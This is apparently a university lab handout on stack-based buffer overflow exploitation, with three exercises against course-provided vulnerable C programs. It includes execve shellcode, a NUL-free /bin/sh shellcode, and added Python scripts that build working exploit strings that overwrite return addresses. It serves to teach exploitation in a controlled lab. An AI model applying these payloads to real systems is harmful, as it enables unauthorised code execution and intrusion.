SI485H: Stack Based Binary Exploits (SP17)



Lab 07: Smash, Smash, Smash … booo army!!!!!

Part 1: Don't Smash the Cafe, Babe! (2 points)

Description

  • Use the shell code to exploit the vulnerable program.

Preamble

  • The assignment can be analyzed on your local VM but must be exploited on the course VM to retrieve the secret message.
  • It must be completed on the clone-1 VM for the course, accessible here:

    ssh -p 2201 saddleback.academy.usna.edu
    

Instructions

  • Your task is to retrieve the secret message by exploiting the program below using the shell code provided.
  • The vulnerable program can be found at this path on the clone-1 VM:

    ~aviv/labs/7.1/vulnerable
    
  • The source code for vulnerable is below:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(char *s){
    
      int i = 0xcafebabe;     /* must still equal 0xcafebabe after the copy */
      char buf[0xbf];         /* 191 bytes; strcpy below has no bounds check */
    
      strcpy(buf,s);          /* overflow: copies until the first NUL in s */
    
      if(i != 0xcafebabe){    /* the exploit string clobbered i */
        printf("Danger! I'm out-of-here!\n");
        exit(1);
      }
    
    }
    
    int main(int argc, char * argv[]){
      if ( argc < 2){
        printf("I pitty the fool who doesn't give me at least one argument!\n");
        exit(2);
      }
      foo(argv[1]);
    
      printf("Go Army!\n");
      exit(0);
    }
    
  • The provided shell code will execve() a program called secret that displays the secret message:

    SECTION .text
            global _start
    
    _start:
            jmp callback            ; hop over dowork to the call below
    dowork:
            pop esi                 ; esi = address of the path string pushed by call
            xor ecx,ecx             ; ecx = 0 (argv = NULL)
            mul ecx                 ; eax = edx = 0 (envp = NULL)
            mov al,0xb              ; eax = 11 = execve
            mov ebx, esi            ; ebx = pathname
            int 0x80                ; execve(pathname, NULL, NULL)
    callback:
            call dowork             ; pushes the address of the string that follows
            db "/home/aviv/las/7.1/secret",0x0
    
  • The permissions on secret are such that you can only run it, and so reveal the secret message, by exploiting the vulnerable program.
  • You MAY NOT change the shell code in any way, but you will need to compile and hexify it.
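The script below is an added example, not part of the lab handout: it hexifies assembled shell code and builds a Part 1 exploit string that writes 0xcafebabe back over i. The frame offsets, the stack address and the stand-in shell code bytes in it are placeholders to be replaced by what gdb shows on clone-1; it assumes that i and the saved return address sit above buf and that the shell code, whose path string is NUL-terminated, therefore has to come last in the string.

```python
"""Added example (not from the lab handout): hexify assembled shell code and lay
out the Part 1 exploit string so that foo()'s 0xcafebabe check still passes.

Assumptions, to be confirmed in gdb on the clone-1 VM (the offsets and
addresses used below are placeholders, not measured values):
  * buf[0xbf] sits at the lowest address of foo()'s frame, then the int i,
    then the saved ebp, then the saved return address;
  * strcpy() stops at the first NUL, so everything before the shell code must
    be NUL-free and the shell code goes last: the NUL ending its path string
    is supplied by argv's own terminator.
"""
import struct
import sys

COOKIE = 0xcafebabe


def hexify(code: bytes) -> str:
    """Render bytes as \\xNN escapes, the form used inside a python -c 'print ...'."""
    return "".join(f"\\x{b:02x}" for b in code)


def build_part1(shellcode: bytes, cookie_off: int, ret_off: int, buf_addr: int) -> bytes:
    """Exploit string for strcpy(buf, s) in foo().

    cookie_off : offset of i from buf[0]
    ret_off    : offset of the saved return address from buf[0]
    buf_addr   : address of buf on the stack
    The return address is redirected to buf_addr + ret_off + 4, i.e. to the
    shell code that strcpy() places right after the saved return address.
    """
    if shellcode.endswith(b"\x00"):       # the listing's trailing db 0x0:
        shellcode = shellcode[:-1]         # argv terminates the string anyway
    if cookie_off + 4 > ret_off:
        raise ValueError("i must lie below the return address for this layout")
    new_ret = buf_addr + ret_off + 4
    payload = b"\x90" * cookie_off                       # fill buf up to i
    payload += struct.pack("<I", COOKIE)                 # rewrite i with 0xcafebabe
    payload += b"\x90" * (ret_off - cookie_off - 4)      # fill (incl. saved ebp)
    payload += struct.pack("<I", new_ret)                # saved return address
    payload += shellcode                                 # lands at new_ret
    if b"\x00" in payload:
        raise ValueError("NUL byte in exploit string: strcpy() would truncate it")
    return payload


# Placeholder values for the demo; replace them with what gdb reports.
COOKIE_OFF = 0xc0   # i right after the 191-byte buffer, 4-byte aligned
RET_OFF = 0xcc      # saved return address
BUF_ADDR = 0xbffff500
STANDIN_SHELLCODE = b"\xcc" * 43 + b"\x00"   # stands in for the assembled listing


def demo() -> bytes:
    return build_part1(STANDIN_SHELLCODE, COOKIE_OFF, RET_OFF, BUF_ADDR)


if __name__ == "__main__":
    # usage: nasm -f bin shell.asm -o shell.bin
    #        ~aviv/labs/7.1/vulnerable "$(python3 exploit.py shell.bin)" > secret.txt
    code = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else STANDIN_SHELLCODE
    payload = build_part1(code, COOKIE_OFF, RET_OFF, BUF_ADDR)
    sys.stderr.write(hexify(payload) + "\n")   # human-readable copy
    sys.stdout.buffer.write(payload)           # raw bytes for "$(...)"
```

nasm -f bin produces the raw shell code bytes; the script writes the exploit string to stdout, so command substitution hands it to the program as argv[1] (which is also why the string may contain no NUL byte).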

Submission

  • You must submit secret.txt, which contains the secret message
  • The best way to store this is as follows:

    ~aviv/labs/7.1/vulnerable [EXPLOIT STRING] > secret.txt
    

Hints

  • None. You got this one.

Part 2: Smashable Pointers are Dangerous! (4 points + 1) (REQUIRED!)

Description

  • Launch a shell by exploiting the vulnerable program. This gives you access to an RSA private key, enabling you to ssh into another VM where a secret message is stored. Retrieve the secret message.
  • This lab is required! You get a bonus point on completion, i.e., 5/4 points for doing it.

Preamble

  • The assignment must be completed on the clone-1 VM, accessible via

    ssh -p 2201 saddleback.academy.usna.edu
    

Instructions

  • Your task is to exploit the program below so that you can launch a shell on the clone-1 VM, use the private-key file you then have access to in order to ssh into clone-2, and read the secret file on the clone-2 VM.
  • The vulnerable program can be found here on the clone-1 VM:

    ~aviv/labs/7.2/vulnerable
    
  • There is an RSA public/private key pair that you will have permission to access once you launch a shell. The private key is found here:

    ~aviv/labs/7.2/vulnerbale/lab7-2_id_rsa
    
  • Using that private key, you can then ssh into the clone-2 VM like so:

    ssh -p 2202 -i lab7-2_id_rsa lab7-2@saddleback.academy.usna.edu
    
  • On the clone-2 VM, as the lab7-2 user, you'll find the secret message at this path:

    ~lab-7.2/secret.txt
    
  • The exploitable program, vulnerable, has the following source code:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(char *s){
    
      char * p;                  /* destination cursor, stored on the stack near buf */
      char buf[300];
    
      for(p=buf; *s; p++,s++){   /* no bound: stops only at the NUL ending s */
        *p = *s;                 /* once the copy runs into p, later bytes go wherever p now points */
      }
    
      return;
    }
    
    int main(int argc, char * argv[]){
      if ( argc < 2){
        printf("I pitty the fool who doesn't give me at least one argument!\n");
        exit(2);
      }
    
      foo(argv[1]);
    
      printf("Go Army!\n");
      exit(0);
    }
    

Submission

  • You must submit a secret.txt containing the secret message

Hints

  • Consider what happens when you smash the pointer p: once you overwrite that value, you can get the copy loop to write almost anywhere … such as over the return address.
  • But don't overwrite the address of your exploit string!
  • You'll need to use a different shell code than the jmp-callback one: the copy loop stops at the first NUL byte, and that shell code ends with one.
  • ssh refuses a private key file that group or others can read, so the key must be readable by its owner only.
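Added example, not the lab's own code: a builder for the Part 2 exploit string together with a small simulation of foo()'s loop, which makes the single-byte pointer smash visible. It assumes an unoptimized build in which buf sits below p, p is reloaded from memory on every iteration, and p and the saved return address share a 256-byte aligned stack window; the addresses are placeholders to be replaced from gdb, and the /bin/sh shell code is the conventional push-based one rather than the lab's jmp-callback payload.

```python
"""Added example (not from the lab handout): the Part 2 exploit string, and a
simulation of foo()'s copy loop that shows why a single byte is enough to
redirect the pointer p onto the saved return address.

Assumptions, to be checked in gdb (addresses below are placeholders):
  * buf[300] lies below p in foo()'s frame, so the copy runs into p;
  * the build is unoptimized, so p is loaded from memory on every iteration
    and p++ operates on whatever the previous store left there;
  * p and the saved return address lie in the same 256-byte aligned window.
"""
import struct
import sys

# Conventional 32-bit execve("/bin/sh") shell code, not the course's jmp/call-back
# one: it contains no NUL byte, and the copy loop stops at the first NUL.
SHELLCODE = (
    b"\x31\xc0"      # xor eax,eax
    b"\x99"          # cdq             edx = 0  (envp = NULL)
    b"\x50"          # push eax        NUL that terminates the path
    b"\x68//sh"      # push "//sh"
    b"\x68/bin"      # push "/bin"     esp -> "/bin//sh"
    b"\x89\xe3"      # mov ebx,esp     pathname
    b"\x50"          # push eax        argv[1] = NULL
    b"\x53"          # push ebx        argv[0] = pathname
    b"\x89\xe1"      # mov ecx,esp     argv
    b"\xb0\x0b"      # mov al,0xb      SYS_execve
    b"\xcd\x80"      # int 0x80
)


def p32(v: int) -> bytes:
    return struct.pack("<I", v & 0xffffffff)


def build_part2(shellcode: bytes, buf_addr: int, p_off: int, ret_slot: int) -> bytes:
    """buf_addr: address of buf; p_off: offset of p from buf[0];
    ret_slot: address of foo()'s saved return address."""
    p_addr = buf_addr + p_off
    if (ret_slot - 1) & ~0xff != p_addr & ~0xff:
        raise ValueError("return slot not reachable with a one-byte overwrite of p")
    payload = shellcode.ljust(p_off, b"\x90")        # shell code, then NOPs up to p
    if len(payload) != p_off:
        raise ValueError("shell code does not fit below p")
    # This byte is stored over p's low byte; the loop then does p++ on the
    # modified p, so the next store goes to ret_slot.
    payload += bytes([(ret_slot - 1) & 0xff])
    payload += p32(buf_addr)          # written through p: the new return address
    # Stop here: one more byte would overwrite foo()'s argument s, the
    # pointer to this very string.
    if b"\x00" in payload:
        raise ValueError("NUL byte in exploit string: the copy loop would stop early")
    return payload


def simulate_foo(payload: bytes, buf_addr: int, p_off: int, frame_size: int) -> bytearray:
    """Run foo()'s loop on a fake frame: buf at index 0, p stored at p_off."""
    mem = bytearray(frame_size)

    def load_p() -> int:
        return int.from_bytes(mem[p_off:p_off + 4], "little")

    def store_p(v: int) -> None:
        mem[p_off:p_off + 4] = p32(v)

    store_p(buf_addr)                      # p = buf
    for ch in payload:                     # for (; *s; p++, s++)
        idx = load_p() - buf_addr
        if not 0 <= idx < frame_size:
            raise IndexError("store outside the simulated frame")
        mem[idx] = ch                      # *p = *s  (may hit p itself)
        store_p(load_p() + 1)              # p++ on the possibly-smashed p
    return mem


# Placeholder frame: p right above buf, saved ebp at +304, return address at +308.
BUF_ADDR = 0xbffff480
P_OFF = 300
RET_SLOT = BUF_ADDR + 308


def demo():
    payload = build_part2(SHELLCODE, BUF_ADDR, P_OFF, RET_SLOT)
    mem = simulate_foo(payload, BUF_ADDR, P_OFF, 320)
    new_ret = int.from_bytes(mem[308:312], "little")
    return payload, mem, new_ret


if __name__ == "__main__":
    payload, _, new_ret = demo()
    assert new_ret == BUF_ADDR
    sys.stdout.buffer.write(payload)   # ~aviv/labs/7.2/vulnerable "$(python3 exploit.py)"
```

In the simulation the store at offset 300 lands on p's own low byte, the following p++ turns that into the address of the return slot, and the last four bytes of the string arrive there; the string ends at that point so that s, one slot higher, is left alone.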

Part 3: Smashing Standard Input (3 points)

Description

  • Exploit the program to reveal the secret message.

Preamble

  • The assignment must be completed on the clone-1 VM accessible here:

    ssh -p 2201 saddleback.academy.usna.edu
    
  • GitLab repository:

    http://saddleback.academy.usna.edu/aviv/lab-7.3
    

Instructions

  • On the clone-1 VM, you will find a vulnerable program called vulnerable at the following path:

    ~aviv/labs/7.3/vulnerable
    
  • The secret file can be found here:

    ~aviv/labs/7.3/secret.txt
    
  • The source code for the vulnerable program is below:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(){
    
      char buf[0x10];              /* 16 bytes */
    
      printf("%s", "Say something spirtiful!\n");
    
      scanf("%s",buf);             /* no field width: reads a whitespace-delimited token of any length */
    
    }
    
    int main(int argc, char * argv[]){
      foo();
      printf("Go Army!\n");
      exit(0);
    }
    
  • Develop an exploit to reveal the secret message.

Submission

  • You must submit three files:
    • secret.txt : the secret message
    • shell.asm : asm formatted version of your shell code that you used
    • description.txt : text file describing how you accomplished this task

Hints

  • You might find that scanf() doesn't properly read your shell code because of how %s parses its input: it stops at the first whitespace byte, and isspace() counts 0x09 through 0x0d as well as 0x20 as whitespace. So come up with some creative ways to handle that.